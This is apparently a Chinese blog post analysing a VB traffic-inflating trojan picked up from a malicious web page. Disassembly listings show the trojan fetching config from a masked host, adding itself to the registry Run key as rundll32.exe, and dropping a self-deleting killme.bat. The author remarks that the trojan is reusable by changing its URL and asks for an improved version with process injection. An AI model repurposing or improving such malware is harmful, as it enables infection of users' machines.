扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
系统补丁打完,网上瞎灌,居然还中网马,哎.现在....把他网马down下来,8错,真牛.通杀98.nt.2000.xp.xpsp2.2003.自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。
脱壳略,VB编写。
00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj
00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX
00403DB9 . EB 0A JMP SHORT Rundll32.00403DC5
00403DBB >C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0
00403DC5 >8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX
00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0
00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8
00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove
00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6
00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7
00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]
00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8
00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E84 . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9
00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A
00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B
00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"
00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup
00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11 . 51 PUSH ECX
00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18 . 52 PUSH EDX
00403F19 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"
00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8
程序会到http://www.xxxxxxxx.com 的tc 文件读取配置文件,同时访问tc/MMResult.asp
生成文件
00404DA2 . /EB 0A JMP SHORT Rundll32.00404DAE //获取文件路径堆栈
00404DA4 >|C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0
00404DAE >\8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //我程序路径是 "D:\fuck you"
00404DB4 . 50 PUSH EAX //路径入eax
00404DB5 . 68 80274000 PUSH Rundll32.00402780 ;//生成killme.bat
00404DBA . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404DC0 . 8BD0 MOV EDX,EAX //文件路径+文件名字D:\fuck you\killme.bat
00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404DCE . 50 PUSH EAX
00404DCF . 6A 01 PUSH 1
00404DD1 . 6A FF PUSH -1
00404DD3 . 6A 02 PUSH 2
00404DD5 . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen
00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1 . 51 PUSH ECX
00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8 . 52 PUSH EDX
00404DE9 . 6A 02 PUSH 2
00404DEB . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404DF1 . 83C4 0C ADD ESP,0C
00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404E00 . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23
00404E07 . 68 9C274000 PUSH Rundll32.0040279C ;@echo off
00404E0C . 6A 01 PUSH 1
00404E0E . 68 B4274000 PUSH Rundll32.004027B4
00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E19 . 83C4 0C ADD ESP,0C
00404E1C . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24
00404E23 . 68 BC274000 PUSH Rundll32.004027BC ;sleep 100
00404E28 . 6A 01 PUSH 1
00404E2A . 68 B4274000 PUSH Rundll32.004027B4
00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E35 . 83C4 0C ADD ESP,0C
00404E38 . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25
00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0
00404E46 . 75 1C JNZ SHORT Rundll32.00404E64
00404E48 . 68 A8934000 PUSH Rundll32.004093A8
00404E4D . 68 94254000 PUSH Rundll32.00402594
00404E52 . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ;msvbvm60.__vbaNew2
00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E62 . EB 0A JMP SHORT Rundll32.00404E6E
00404E64 >C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E6E >8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C]
00404E74 . 8B08 MOV ECX,DWORD PTR DS:[EAX]
........
00404F1D . 52 PUSH EDX
00404F1E . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj
00404F24 . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX
00404F2A . EB 0A JMP SHORT Rundll32.00404F36
00404F2C >C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0
00404F36 >68 D4274000 PUSH Rundll32.004027D4 ;del
00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //程序的文件名字
00404F41 . 50 PUSH EAX //文件名入栈 (rundll322)
00404F42 . 68 E4274000 PUSH Rundll32.004027E4 ;.exe (rundll322.exe)
00404F47 . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F4D . 8BD0 MOV EDX,EAX
00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404F55 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F5B . 50 PUSH EAX
00404F5C . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F62 . 8BD0 MOV EDX,EAX //(del rundll322.exe)
00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F6A . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F70 . 50 PUSH EAX
00404F71 . 6A 01 PUSH 1
00404F73 . 68 B4274000 PUSH Rundll32.004027B4
00404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404F7E . 83C4 0C ADD ESP,0C
00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F87 . 51 PUSH ECX
00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4]
00404F8E . 52 PUSH EDX
00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0]
00404F95 . 50 PUSH EAX
00404F96 . 6A 03 PUSH 3
00404F98 . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404F9E . 83C4 10 ADD ESP,10
00404FA1 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]
00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404FAD . C745 FC 26000>MOV DWORD PTR SS:[EBP-4],26
00404FB4 . 68 F4274000 PUSH Rundll32.004027F4 ;del killme.bat
00404FB9 . 6A 01 PUSH 1
00404FBB . 68 B4274000 PUSH Rundll32.004027B4
00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FC6 . 83C4 0C ADD ESP,0C
00404FC9 . C745 FC 27000>MOV DWORD PTR SS:[EBP-4],27
00404FD0 . 68 18284000 PUSH Rundll32.00402818 ;cls
00404FD5 . 6A 01 PUSH 1
00404FD7 . 68 B4274000 PUSH Rundll32.004027B4
00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FE2 . 83C4 0C ADD ESP,0C
00404FE5 . C745 FC 28000>MOV DWORD PTR SS:[EBP-4],28
00404FEC . 68 24284000 PUSH Rundll32.00402824 ;exit
00404FF1 . 6A 01 PUSH 1
00404FF3 . 68 B4274000 PUSH Rundll32.004027B4
00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FFE . 83C4 0C ADD ESP,0C
00405001 . C745 FC 29000>MOV DWORD PTR SS:[EBP-4],29
00405008 . 6A 01 PUSH 1
0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose
00405010 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A
00405017 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0
0040501E . 75 1C JNZ SHORT Rundll32.0040503C
00405020 . 68 A8934000 PUSH Rundll32.004093A8
00405025 . 68 94254000 PUSH Rundll32.00402594
生成批处删记录
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit
简单的写注册表run。
004046ED . BA 5C284000 MOV EDX,Rundll32.0040285C ;software\microsoft\windows\currentversion\run
004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8]
004046F8 . FF15 40114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy
004046FE . C745 FC 17000>MOV DWORD PTR SS:[EBP-4],17
00404705 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>; windir
0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00404719 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00404725 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup
0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]
00404731 . 52 PUSH EDX
00404732 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]
00404738 . 50 PUSH EAX
00404739 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar
0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>; \rundll32.exe
直接给出分析的总结吧。版权 BY。混世魔王 QQ:26836659
程序只是为了刷访问量。没有什么后门。也就隐藏了URL。用XXXX代理了。
程序运行后,你的电脑会访问 http://www.xxxxxxxx.com/tc/MMResult.asp
看代码
‘地址用xxx代替了
’站长站的流量统计
把自身复制到c:/windows/
会生成批处删本地目录运行程序。
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit
程序的运行方式是 写注册表
software\microsoft\windows\currentversion\run
键值rundll32.exe
程序写的不好,要插入进程,那效果会点。
只要把他程序的URL 修改一下这个木马就可以自己使用了.
有不足,还希指出。
程序编写很简单,但是技术丢了好久了,不去恶补写不出,也没有时间去恶补。
有编程不错的,写了记得传我一个。呵呵。msn:hsmw26836659@hotmail.com
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者